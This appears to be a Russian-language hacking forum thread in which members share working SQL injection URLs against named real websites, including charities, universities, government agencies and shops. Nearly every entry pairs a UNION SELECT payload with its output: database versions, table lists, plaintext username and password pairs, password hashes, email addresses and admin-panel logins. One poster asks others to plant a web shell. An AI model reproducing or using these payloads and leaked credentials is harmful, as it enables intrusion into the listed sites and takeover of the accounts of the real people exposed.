Chuck Prickett:dcf24fe936aaf7ed828da2cef9901a60:visn10@i dleworth.com

Админка:

Для начала нужно залогинится здесь - http://onixvisn10.com/login.php
А потом заходить сюда - http://onixvisn10.com/admin/


Email Address - visn10@idleworth.com
Password - 2resume

http://www.usmcoc.org {PR 6}
http://www.usmcoc.org/event.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6--

5.0.67-community : vicom_usmcoc : vicom_usmcoc@localhost

tables:
http://www.usmcoc.org/event.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6+ from+information_schema.tables--

------------------------------------------------------------------------------------------------

http://www.fraudadvisorypanel.org {PR 5}
http://www.fraudadvisorypanel.org/newsite/events.php?id=3+union+select+1,concat_ws(0x3a,vers ion(),database(),user()),3,4,5,6,7,8,9,10,11,12,13--

4.1.22 : fap_events: fap_events@83.223.106.10

table users:
http://www.fraudadvisorypanel.org/newsite/events.php?id=3+union+select+1,group_concat(userna me,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+u sers--

username : password
fap:apw4fap
testuser:testpword
Tamaryn:michael
MiaCampbell:Molly74

http://www.fraudadvisorypanel.org/newmembers/login.php

------------------------------------------------------------------------------------------------

http://www.monroenc.org {PR 5}
http://www.monroenc.org/events.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9--

version() - 5.0.67
database - monroenc
user - monroenc@localhost

PR6
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,concat_ws(0x3a,user,passwo rd)+from+mysql.user/*
Database Version: 4.1.21-standard
Database name: gaston_db
User name: tltltl@info.umb.edu

root:00c8bef335a35d31

www.sonybmgmusic.co.uk
Просто красивая(как мне кажется) иньекция..
Пользователи, их пароли:
http://www.sonybmgmusic.co.uk/artists/annie_lennox'%20and%200%20union%20select%201,2,3,4 ,5,group_concat(concat_ws(0x3a,iu_id,iu_email,iu_p assword,iu_first_name)%20separator%20'%3Cbr%3E'),7 ,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20int ranet_users--%20

P.S. Это не боян,
гуглим site:forum.antichat.ru sonybmgmusic.co.uk/
результат выдал адрес
https://forum.antichat.ru/printthread.php?t=21336&page=617&pp=10
где находится сообщение пользователя Buddah:
"нашел сайт очень интересный)) у самого опыта мало, может кому тоже интересно будет"
sonybmgmusic.co.uk/artists/annie_lennox/-1/order+by+2/* 0" - а это почти ничего, тут даже инъекции нет, потаму что кроме других неверных моментов (которые имеют место быть), в первую очередь тут знак + не проходит за пробел, а проходит как просто символ '+', уже поэтому никакого order by в таком виде не будет. Написал это, потаму что кто-то обвинил в том, что я кинул боян.

{PR6}
http://www.effwa.org/main/page.php?number=72+UNI ON+SELECT+0,1,2,3,4,5,concat(table_name,0x0b,colum n_name),7,8,9,10,11,12,0x73716C696E6A666C643137,0x 73716C696E6A666C643137,0x73716C696E6A666C643137,0x 73716C696E6A666C643137+FROM+INFORMATION_SCHEMA.COL UMN S--


effwadbu@web-ppb.srv.lexi.net
5.0.67-log
effwa

{PR4}
http://www.filmdigitizer.com/about.php?sid=-2+UNION+SELECT+0,concat_Ws(0x 0b,vers ion(),user(),database()),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

5.0.67
holmesmillet@web01.vidar.com
vidarMain

Все таблицы
http://www.filmdigitizer.com/about.php?sid=-2+UNION+SELECT+0,concat_Ws(0x0b,table_name,col umn_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27+from+information_sch ema.columns

{PR6}
http://www.talkingcock.com/html/article.php?sid=-2427+UNION+SELECT+0,1,2,conc at_ws(0x0b,user(),version(),dat abase()),4,5,6,7,8,9,10+--+

thecock@localhost
4.0.20-standard
tc21


http://www.talkingcock.com/html/article.php?sid=-2427+UNION+SELECT+0,1,2,con cat_ws(0x0b,email,pas s),4,5,6,7,8,9,10+FROM+tc21.users+LIMIT+8500,1+--+

Юзеры 8500 человек

PR: 2

http://www.parcobelvedere.it/hotel.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os)--&l=e

5.0.51a-5-log:PARCOBELVEDERE:PARCOBELVEDERE@r5d6.wp.wifisolu tion.it:debian-linux-gnu

www.chehaliscoral.com

http://www.chehaliscoral.com/page.php?id=-10'+union+select+concat_ws(0x3a,version(),user(),d atabase()),2/*

Версия - 5.0.33:
Юзер - chehaliscoral@localhost
БД - chehaliscoral

Юзеры:

http://www.chehaliscoral.com/page.php?id=-10'+union+select+concat_ws(0x3a,id,password,email) ,2+from+users+limit+0,1/*

5:234:ryan

Админка:
http://www.chehaliscoral.com/admin

Username - ryan
Password - 234

_http://www.floramed.ru/detailnews.php?id=-115+union+select+1,2,concat_ws(0x3a,version(),user (),database())

4.0.27-log:flora@zvm14.host.ru:flora

_http://www.adameva.ru/index.php?link_n=6&id_theme=30012&page=1&id_section=923+union+select+concat_ws(0x3a,EMAIL_U SER,PASSWORD)+from+users+limit+1,1--&forum_desc=

KBALENKO@MAIL.RU:PUSHKA

PR: 4

http://www.lupoeditore.it/casa_editrice/dettaglio_concorso.php?id=-1+union+select+1,version(),3,4,5,6,7--

юзеры : http://www.lupoeditore.it/casa_editrice/dettaglio_concorso.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,usern ame,password)),3,4,5,6,7+from+gestione_utente--


lupo:123lupetti,depensato:1234,Cirrolo:1234,tienid uro:1234,amod:1234,VENCESLAO:1234,angelo:1234,,,:, :,raro:rarissimo,cesare:1234,lunatika42:1234,annic a:1234,1pixel:1234,effeblu:1234,,robotpb:pimpis,an tonello:onairam,gccasarano:230805,alberto.facchini :gianna,ludav:airone44,cleo:cleo98,,GINEVRA:achill e,cappelli:cappelli,claudio boccardi:athenaze,gigiobill:annafalchi,sissi:geron imo,kekko:kekko,alemonti:24682468,ndindi93:asdola, sassicaia:sassicaia,ciscotn:nike2004,robinhood:rob inhood,nonhodormitomai:massimo,william85:210185,fa tandsowhat:lucacamilo,madrisio:madrisio,,vibodha:a pritisedano,isabella:budapest,rarissimo:rarissimo, Paracelso:Mariomario,lordgc:apocalisse,barbiedoll: barbie,luiggione:paperino,alessandraterni:solita cosa,flygirl75:morrison,patrizia.kopsch,vitogreco: angolo,fulminata:farfalla,traparentesi:parole,ales sandraterni:solita cosa,gigiobill:annafalchi,antonio:123lupetti,gigio bill:annafalchi,Adilon89:1989A,roby72:robylupo,Mar got:230987,,sorgoles:catania,g.facciotti:degregori 51,elio1954@alice.it:paolawi


##############################################

http://estetika-it.ru/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--

4.1.25:estetika_user@localhost:estetika_it

All India Oracle Users Group
Google PageRank : 4
http://www.aioug.org
/eventdetails.php?id=-5+union+select+1,2,3,concat_ws(0x20,version(),user (),
database()),5,6,7,8,9,10,11,12

version 5.0.67-msl-icd1-log
user aioug@localhost
database aioug_dbt


columns from users

http://www.aioug.org/eventdetails.php?id=-5+union+select+1,2,3,column_name,
5,6,7,8,9,10,11,12+from+information_schema.columns +where+table_name=char(117,115,101,114,115)+limit+ 2,1

http://www.aioug.org/eventdetails.php?id=-5+union+select+1,2,3,column_name,5,6,7,8,9,10,11,1 2+from+information_schema.columns+where+table_name =
char(117,115,101,114,115)+limit+3,1

(email,pass)

http://www.aioug.org/eventdetails.php?id=-5+union+select+1,2,3,
concat_ws(0x20,id,email,pass,website),5,6,7,8,9,10 ,11,12+from+users+limit+1,1

http://4e.plantphys.net/printer.php?ch=5&id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10plantphy@localhost:plan tphys_4e:4.0.14-standard-log

ПР5
http://sozmod.eawag.ch/cv.php?id=1+union+select+unhex(hex(TABLE_NAME))+fr om+information_schema.tables+/*+

ПР5
http://www.enrd.org/publications.php?id=-3+union+select+1,2,concat_Ws(0x3a3a,tcuser,tcpass, email,tcid,tcname),4,5,6,7+from+tbltelecenter--
rajukhanal::rainakhanal::mahabir@gmail.com::1::Gho repani Telecenter

http://uac.unborn.at/forumv2.php?cat=4'+and+0+union+select+1,2,concat_w s(0x20,id,nick,pw,nname,icq,mail),4,5,6+from+users +where+id=1/*

Астранань.ру

http://www.astrakhan.ru/humour/?cmd=read_full&id=%27+UNION+SELECT+1,2,3,4,password,6,7,8+FROM+as trakhan.portal_users+where+login=%27tHunder%27/*

http://ifisc.uib.es/publications/publications.php?id=-10+union+select+TABLE_NAME,2+from+information_sche ma.tables+limit+197,1000--

tables:
jos_users
user
virtual_users
virtual_domains
view_users
users
series_users
series
seminarios
turba_shares_users
nag_shares_users
mnemo_shares_users
ingo_shares_users
horde_users
wp_users
usuarios
Таблицы все закрыты((

http://ifisc.uib.es/publications/publications.php?id=-10+union+select+concat_ws(0x3a3a,user,password),2+ from+mysql.user--

http://audiovisuals.audio.uv.es/tau/producciones.php?action=prod&id=-9999+union+select+1,2,concat_ws(0x20,version(),
user(),database()),4,5,6,7,8,9,10,11,12

version 4.0.17-nt
user root@localhost
database tau

http://www.romver.ru/services/services.php?razdel=-1117+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,concat_ws(0x 0b,user(),dat abase(),version()),11,12

caramel@10.210.10.10
caramel
5.0.75-log

В таблицах ниче интересного, админки нет

ПР5
http://www.fraudadvisorypanel.org/newsite/publications.php?c_id=-1+union+select+1,2,username,password,id,6,7,8,9,10 ,11,12,13+from+members/*

davido1 leaden
Админку не нашёл(

http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+23,1/*
через column_name узнал, что в этой таблице есть id,login,password
дальше копать не могу, не позволяют знания пока...

попробовал: http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,login,4,5,6,7,8,9,10,11+from+ad min/*
не работает...

p.s. ТИЦ 40
Если кто докопает что-интересного, напишите в лс, хотя бы понять что не правильно делал.

http://www.ma-consult.ru/public2.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--

4.0.27-log:fgtkmcby@localhost:fgtkmcby

AlexSatter ня

http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,concat_ws(0x3a,id,login,passwor d),4,5,6,7,8,9,10,11+from+birja_hosting_miheeff_ru .admin/*

ошибка твоя заключалась в том что таблицы admin небыло в бд под которой сайт работает.

http://www.izone.ru/soft_admin/go.php?action=home&id=3075-1+union+select+concat(version(),char(58),database( ),char(58),user())
Дальше непрёт, хз какие там таблицы, в information_schema не роет. Есль кто подберёт, мне напишите, ок
зы: в адресную строку смотрите ))

----------------
http://www.lhfa.louisiana.gov/news/news_detail.php?ID=-100'+union+select+1,2,3,4,5,6,7,8,9/*
----------------------------------
Database Version: 5.0.45
Database name: lhfa2
User name: lhfa@localhost
------------------------------------

/admin/

|----------------------------------|
admin : Lhfa$543
|----------------------------------|

PR: 4

http://www.migrationhistory.com/ma/index.php?section=members&id=1+union+select+1,concat_ws(0x3a,version(),user( ),database())--

4.0.18:migrationhistory@srv102.webdeal.no:migratio nhistory

www.sh2all.com

http://www.sh2all.com/down.php?id=-1098+union+select+1,concat_ws(0x0b,version(),user( ),database()),3,4,5

Версия - 5.0.67-community
Юзер - sh2all_protect@localhost
БД - sh2all_protect


Табличка юзеры:

http://www.sh2all.com/down.php?id=-1098+union+select+1,concat_ws(0x0b,id,username,pas shash,email),3,4,5+from+users


Ник - admin
Хэш - e8438e60f23ca196598c540d2e5b6d4b
Мыло - eng.m7mod@hotmail.com


Табличка админ:

http://www.sh2all.com/down.php?id=-1098+union+select+1,group_concat(0x0b,username,pas sword),3,4,5+from+admin


locus:15963

admin:password


Админка
http://www.sh2all.com/admin.php?act=login

http://www.keichanyaki.com/archive/index.php?catid=22&qid=-2+UnIoN+SeLEcT+version(),2,3

http://www.keichanyaki.com/archive/index.php?catid=22&qid=-2+UnIoN+SeLEcT+username,2,3+from+cfaq_admin_crm
http://www.keichanyaki.com/archive/index.php?catid=22&qid=-2+UnIoN+SeLEcT+password,2,3+from+cfaq_admin_crm
только, почему то ошибка..

мой 100-ый пост хДДД
http://www.akl-ma.net/members/success_stories/showdetials.php?id=1+union+select+1,2,concat_ws(0x 3a,version(),user(),database()),4,5,6,7,8,9--

4.1.22-standard:aklmanet_akluser@localhost:aklmanet_akl

http://www.latindex.unam.mx/larga.php?opcion=1&folio=9999999999+union+select+password+from+usuari o+--+
PostgreSQL

PR: 3

http://hedgie.eu/ma/me/place/NHindex.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9,10,11,12,3,14,15,16,17,18 ,19,20,21,22--&cal=2

4.1.22-standard:hedgius2_mamb1@localhost:hedgius2_mamb1

###############################################

http://www.ma-pa.org/content.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6--

5.0.32-Debian_7etch6:ma_pa_org@localhost:ma_pa_org

###########################################
прикольная скуля ))))) смареть в пути картинки которая не открывается ))увидите

http://ma-hepub.com/gallery_lists.php?gallery_ID=3&id=-1+union+s elect+1,2,vers ion(),4,5--

http://ma-hepub.com/gallery_lists.php?gallery_ID=3&id=-1+union+select+1,2,group_concat(table_name ),4,5+from+information_schem a.tables+group+by+table_s ema+ limit+1,1--

tables:
home,about,receipt,file,wmv,page,distributer,shopp ing_type,mycalendar,bullet,relations_news,iv,accou nt,reference,gallery,pictrue,download,system,news,
clients,sendnews,member,article,reference_type,gal lery_type,products,download_type,useronline,newsle tter,comment,shopping,menu,banner,relations,guestb ook,products_type,faq,users,od,contact,
shopping_reserve,monetary,banner_menu,relations_ar ticle

http://ma-hepub.com/gallery_lists.php?gallery_ID=3&id=-1+union+select+1,2,group_concat(concat_ws(0x3a,use rname,pa ssword)),4,5+ from+users --

users:

grich:392607,admin:admin,test:test,9grich:1234,tom :tom,jeab:240600,PpP:74123698,Kathy:3316600,johnny bravo:113249223,
champ29:29121984,jaxx1860:jaxx1860,beerkabpom:0470 03591,MAX:15621234,unicon13:379158,babydoy2526:123 456789

ПР5
http://www.mainepolicy.org/news/show.php?news_id=-259+union+select+1,concat(username,char(58),passwo rd,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14+fr om+users/*&category=1
Админку не нашёл((

http://glastonburytrust.co.uk/news_detail.php?pID=-8+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8

Database Version: 5.0.67-community
Database name: glastonb_db
User name: glastonb_db@localhost

In database glastonb_db found table users
1 : name
2 : email
3 : password
4 : status
5 : university

ПР4
http://brml.technion.ac.il/publications.php?id=-3+union+select+1,version(),3,4,5+/*+
4.1.22-log

http://pi.aq-central.com/roster.php?id=1+union+select+version()--

5.0.75-community-log

http://pi.aq-central.com/roster.php?id=1+union+select+group_concat(concat_w s (0x3a,usernam e,pass word))+from+use rs--

admin:admin,superJAYdude:baconbits1,Jason A. Churchill:888888,PositivePaul:FreeGeorgeSherrill,M arlin Man:Safari,DAMellen:dirtysocks


##############################################
PR 4

http://www.zeva.com.au/registry.php?id=-1'+u nion+select+1,2,3,4,5,versio n(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33+--+

5.0.67


http://www.zeva.com.au/registry.php?id=-1'+union+select+1,2,3,4,5,group_concat(table_name) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+from+information_sche ma.tables+group+by+table_schema+limit+4,1+--+

через лимиты берем таблы

http://www.strawtec.com.au/content.php?id=-5+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user name,password),10,11,12+from+users+--+&ch=FAQ
strawtecadmin:snowfall88
P.S. админка есть но пас не подходит((

http://www.austraumaconference.org/content.php?id=-2'+union+select+1,2,3,4,5,version()+--+
4.1.22

http://www.vnrhcs.org/news_detail.php?id=26+UNION+SELECT+1,2,3,4,5,6,7,8 ,9+limit+1,1/*

Database Version: 4.1.14-standard
Database name: vnr
User name: vnr@lsh209.chi.us.siteprotect.com

http://www.atriumtower.com/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

1
4.0.27

2

http://www.ukurier.gov.ua/index.php?p=-4+union+select+1,concat_ws(0x3a,login,password),3+ from+users+limit+31,1&id=4

olgas:5b708c065dfab38528050a84d852bf13 pass : 10610

http://bender.samaratoday.ru/webpage.php?id=6+UNION+SELECT+AES_DECRYPT(AES_ENCR YPT(CONCAT(Version(),Database(),User()),0x71),0x71 )+LIMIT+1,1/*

Database Version: 5.0.45-log
Database name: samaratoda_ben
User name: samaratoda_ben@localhost

PR5

http://www.aica-italia.it/interna.php?idsez=-13+union+select+1,2,3,4,version(),6,7,8--

5.0.68-log

http://www.aica-italia.it/interna.php?idsez=-13+union+select+1,2,3,4,concat_ws(char(58),nome_ut ente,password),6,7,8+from+amministrazione--

ilias:4ea4bb924a73da2829c38c88b45eb85a
maria:b8fb37612c3cda3e341e12386a279b49
roberto:c6cc8094c2dc07b700ffcc36d64e2138

Не нашел админки(

Mysgl


http://nouvelivoire.com/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--

3
5.0.67-community



http://diangemilang.com/news/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--

3
5.0.32-Debian_7etch3~bpo31+1-log
--------------------------------------------------------------------------------

10 WIB

5

IP network test & monitoring solutions

PR 3

http://www.shenick.com/show_news.php?id=-87+union+select+1,user(),database(),version(),5,6, 7,8,9+from+user+limit+0,1+--

vesrion() - 5.0.45-log

PASS - 68faf6fe5f3d85c6 mysql hash
Login - выяснить не удалось
//какой-то частичный досутп к information_schema...

http://www.digitalfunnies.com/item.php?item_no=-17+union+select+1,2,3,cast(concat_ws(0x3a,version( ),database(),user())+as+binary),5,6,7,8,9,10--

4.1.16-standard-log:comicscans:comicscans@cyrax.dreamhost.com

==================

http://www.kupi-jeftinije.com/item.php?id=-266+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9--

4.1.22-standard-log:kupijeft_kupi:kupijeft_kupi@localhost

http://www.vats.gov.gh/newsdetails.php?ID=-20+union+select+1,username,password,4,5,6+from+use rs+limit+0,1+--


montero -business - kmantey@gmail.com
kwamedankyi -hello2day - kwame.dankyi@vats.gov.gh
оба амдины.
Админки не найдено....

PR 5

http://www.seo-cms.ru/news_article.php?id=-2692+union+select+version(),2,user(),4,database(), 6/*

4.1.20-lk-log:skvitrru_seo:skvitrru_seo@localhost

при дальнейшем составлении запроса на выборку из таблиц перекидывает на другой сайт, типа фильтр стоит какой то хз, кому интересно поковыряйте

http://www.yp.md/news2/news.php?id=-261+union+select+1,2,3,4,version(),6,user(),8,9,10 ,11,12+--

PR 4

user() - ypmd_tester@localhost
version() - 5.0.67-community-log

есть таблица user_info ,но в ней ничего интересного нет....

http://valdis.org.ru/site.php?id=-2206+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,user(),version(),database()),11,12,13,14,15,16,17

valdis_valdis@localhost:5.0.77-community:valdis_valdis

http://valdis.org.ru/site.php?id=-2206+union+select+1,2,3,4,5,6,7,8,9,TABLE_NAME,11, 12,13,14,15,16,17+from+information_schema.tables+l imit+x,1

в базах ничего интересного не нашел.
PR4, ТИЦ 50

http://www.bank45.ru/site.php?id=-10028+union+select+concat_ws(0x3a,version(),user() ,database())/*

http://www.bank45.ru/site.php?id=-10028+union+select+login+from+users/*

данные выводятся в title

Нашел ещё вот что:
http://www.bank45.ru/users/
особенно понравилось, когда переход по ok.php :)

так же почерпнуть информацию можно здесь:
http://www.bank45.ru/phpinfo.php

PR2 , ТИЦ 10

http://www.shenick.com/show_news.php?id=-87+union+select+1,user(),database(),version(),5,6, 7,8,9+from+user+limit+0,1+--

vesrion() - 5.0.45-log доступ нормальный логин admin,админка по адресу /admin

http://www.massiveattack.com/blog.php?id=-657%20union%20select%201,2,3,4,5,6,CONCAT_WS(7,%20 user(),%20version(),%20database()),8,9.10,11,12,13 ,14,15,16,17,18,19,20,21%20/*

[PR 6]
http://perkins.pvt.k12.ma.us/museum/area.php?id=35+and+substring(@@version,1,1)=3
[PR 4]
http://www.unitech-adc.us/product_info.php?id=41+and+substring(@@version,1,1 )=3

Ого скока уже накидали пока я в запое был суточном ))))ну что поехали

PR: 5

http://www.mondopop.it/news_view_iuk.php?id=-1+union+select+1,ver sion(),3,4,5, 6,7,8,9,10--

5.0.68-log

http://www.mondopop.it/news_view_iuk.php?id=-1+union+select+1,grou p_concat(table_name),3,4,5,6,7,8,9,10+from+informa tion_schema.tables+group +by+table_schema+limit+1,1 --

tables :

about,commenti_iuk,items,order_list,users_prova,ad min,country,kind,press,video,artist,editoriale,new s,users, commenti,exhibitions,news_iuk,users_press

http://www.mondopop.it/news_view_iuk.php?id=-1+union+select+1,group_conca t(concat_ws(0x3a,nick,pa ss)),3,4,5,6,7,8,9,10+from+use rs--

edinho:312630,maccu:pivovarna,keith82:keith82,silv ietta01:salento12,lozoodisimona:coccinella,alex-kama:kama1979,Mondovullo:mondopopchihiro,chicca:zu cchi81,bricius:carmillo,hero:rastapower,sofisoul:c ourmayeur,silvietta:salento12,Elisa:180276,bannann a:anna1126,travismanna:06021959,mohabadel:souris,d iavu:sofia,dragoorione:buruburu,Kite77:artura,magi c_mushroom:pasta123,crazy_luna:ilenia,Bongload:123 45678,ara:haraldone,steve:joejoe35,DocRaspa:181280 ,elMoro:nirvana81,giorgia:bernie,nikoka:netgear,36 68gabriele:giammone,fup1:pippopippopop,mediaformat :mediaformat,T.U.B.E.:theurban,Akiko:tamachan,Ging er:pinnilinni,il7:sbrachetto,LINOandMIA:barvo,samm y:provaciancorasam1,mattteo:massacro23,snob:12345f ,deanpe:robyno69,chilucy:chilucy,jacques:yoyoyo79, lodeaustria:suministro,cla:dadamondopop,A Beatiful Ignorant Blond:blond86,Ironmould:dod77pop,bonkiettina:29048 0l,zuza_matuza:recfrbyf,gra:cerbiatto77,Bernie:son y444,frankie:KaPpy,Vocintesta:matteo1,fra:KaPpy


##########################################
PR: 2

http://www.greenparksystem.it/eng/prodotti2.php?id=-1+union+select+1,2,concat_ws(0x3a,u ser(),database(),versio n()),4,5,6,7,8--

greenpark@localhost:greenpark:4.1.21

http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4

5.0.22:us5167f@localhost:pivomani_shops

http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,TABLE_NAME,3,4+from+information _schema.tables+limit+50,1

Пробуем обратиться к: mysql.user
http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,Password,3,4+from+mysql.user+wh ere+User=0x726F6F74
Получаем: Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
ммм, несоответсвие кодировок. закодируем пароль в .. ну например в hex
http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,hex(Password),3,4+from+mysql.us er+where+User=0x726F6F74
получаем: 31666466326136313036646134646139
преобразовываем обратно: 1fdf2a6106da4da9

Сайт по началу произвел нормальное впечатление, аккуратный, наполненый, но практически в каждом скрипте уязвим к SQL-INJ...
по показателям, сайт нулевой...

ещё один сайт, нулевой, просто ради опыта...
http://stistroy.ru/site.php?id=-4+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8

5.0.67-log:u149824:u149824@10.10.153.196

через information_schema.tables можно посмотреть какие таблицы есть, но ничего интересного нет. да и сайт пустой.


http://www.proherm.ru/site.php?id=-3+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8

4.1.22-log:wwwprohermru:proherm@fe42.hc.ru

http://www.proherm.ru/site.php?id=-3+union+select+1,login,3,4,5,6,7,8+from+accounts+l imit+1,1

login: proherm

но потом оказалось, что это не нужно, нашел:
http://www.proherm.ru/a/
где всё доступно и без паролей.


http://www.valdis.net.ru/site.php?id=-433+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, version(),database(),user()),11,12,13,14,15,16,17

5.0.77-community:valdis_valdis:valdis_valdis@localhost

http://www.valdis.net.ru/site.php?id=-433+union+select+1,2,3,4,5,6,7,8,9,TABLE_NAME,11,1 2,13,14,15,16,17+from+information_schema.tables+li mit+20,1
с 17 до 20 есть таблицы, с юзерами ничего не связано.


ТИЦ 50, PR 1

http://www.tdnovator.com/item.php?division=2&id=-280+union+select+1,2,3,4,5,6,7,8,9,cast(concat_ws( 0x3a,version(),database(),user())+as+binary),11,12 ,13,14,15,16,17,18--

4.1.13a-nt-max-log:1gb_tdnovatordb:1gb_tdnovatordb@10.0.1.8

[PR 5]
http://www.svoa.co.th/product_info.php?id=-70237+union+select+1,concat_ws(0x3a,version(),data base(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
4.0.15a-log:svoaweb:root@172.17.10.14

[PR 3]
http://www.pakman.com.ru/product_info.php?id=-125+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8--
4.1.22-standard-log:pakmanc_pakman:pakmanc_pakman@localhost

[PR 0]
http://rmshop.ru/product_info.php?id=1+union+select+1,concat_ws(0x3 a,version(),database(),user()),3,4,5,6,7,8,9,10,11 ,12--
4.1.22-log:wwwprinterovnet:printero@localhost

[PR 0]
http://www.valvesmanufacturer.cn/product_info.php?id=149+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8,9,10--
4.1.16-nt:glb1:glb1@bizcn-w85

[PR 0]
http://printerov.net/product_info.php?id=-40+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12--
4.1.22-log:wwwprinterovnet:printero@localhost

[PR 0]
http://printmag.ru/product_info.php?id=-211+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12--
4.1.22-log:wwwprinterovnet:printero@localhost

_http://www.energyflashrecords.co.uk/catalogue/title.phtml?product_id=-24946+union+select+1,2,3,4,concat_ws(0x3a,version( ),database(),user()),6,7,8,9,0,1,2,3,4,5,16+--

5.0.67-community:wiz_system:wiz_system@localhost

_http://www.webtrafficpromotions.com/product_detail.php?cid=3&pid=-5+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,0,1,2,3,4,5,6--

5.0.77-community:webtraff_wtp1013:webtraff_wtp1013@localh ost

http://www.e-n.it/index.php?id=1&lg=it&nav=0&art=-15709+union+select +1,2,3,4,5,6,7,8,9, version() ,11,12,13,14 --

5.0.68-log

http://www.e-n.it/index.php?id=1&lg=it&nav=0&art=-15709+uni on+select+1,2,3,4,5,6,7,8,9,group_concat(table_nam e),11,12,13,14+ from+information_schema.tables+group+by+table_sche ma+l imit+3,1--

там куча таблов))))через лимит сморите)

Mysgl

http://www.jambi.net/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--

Access denied for user 'jambi_henky'@'localhost' (using password: YES) in

Access denied for user 'jambi'@'localhost' (using password: NO) in


http://partungkoan.com/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--


http://www.sman1berastagi.sch.id/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--


Access denied for user 'land_landsmile'@'localhost' (using password: YES) in /

http://www.imvtours.it/destinazioni.php?id=-1+uni on+select+1,2,ver sion()--

5.0.68-log

tables:

imv_agenzie,imv_destinazioni_cataloghi,imv_hotels, imv_pagine,imv_visual,
imv_cataloghi,imv_destinazioni_hotels,imv_link,imv _province,imv_curriculum,
imv_galleria,imv_newsletter_subscriber,imv_session i,imv_destinazioni,imv_homepage,imv_offerte,imv_ut enti

user tables: imv_utenti

users:
root:45c82027a4b39a24b8f91f86103eb741,admin:b49645 e33600a00808c51f5a0524db09,marco:c526eb06433395f66 61824dc8f43c3dc

PR3

http://www.altromolise.it/notizia.php?argomento=cronaca&articolo=-38385+union+select+1,2,3,4,5,6,concat(version(),ch ar(58),database(),char(58),user()),8,9,10,11,12,13 ,14,15,16,17,18,19,20--

4.0.30-standard-log:Sql11522_4:Sql11522@62.149.141.27

admins:
gianluca:mussolini
redazione: piccola
sandro:nove17

http://europosuda.ru/shop/index.php?CID=-1+uniOn+Select+1,concat(login,0x3a,password)+from+ ssrusers--

PR: 4

http://dottint.dicea.unifi.it/index.php?fuseaction=showareas&id=1&page=-16+union+select+version()--

5.0.51a-24

tables:
work_student,introduction,posts,forum_mods,video,l iens,themes,document,reponses,catagories,posts_tex t,
access,whosonline,forums,liste_domaines,topics,exe rcice_question,sessions,config,priv_msgs,accueil,w ords,
group_properties,mc_scoring,exercices,user_group,s tat_accueil,course_description,questions,agenda,wo rk,
headermetafooter,pages,forum_access,users,student_ group,disallow,ranks,banlist

http://dottint.dicea.unifi.it/index.php?fuseaction=showareas&id=1&page=-16+union+select+group_concat(concat_ws(0x3a,user,p as sword,file_priv))+from+mysql. user+group+b y+file_priv+limit+1,1--

file_priv : Y

root:0fdabf2d0422efe4:Y,claroroot:28ba5d674194eb31 :Y,debian-sys-maint:*3DDF0119DF873573462050B67B02D659CA586C52,di r-dic:47f1e8824f72016b:Y,elka:40cc7d9422737e7e:Y,dic web:35be89a25baf7df9:Y,fabio:05d26b55199cdec1:Y,eg jp:40cc7d9422737e7e:Y,leo:5ccae1205bd560b6:Y

кто сильный знаток в теме с файлом_прив У,просто я где то читал что мона залить шелл через SQL ,залейте плиз и в ПМ киньте )))если не жалко вам будет

PR3, ТИЦ 120

http://www.replicator.ru/part.php?news_sort=-2+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9,10,11,12,13,14,15

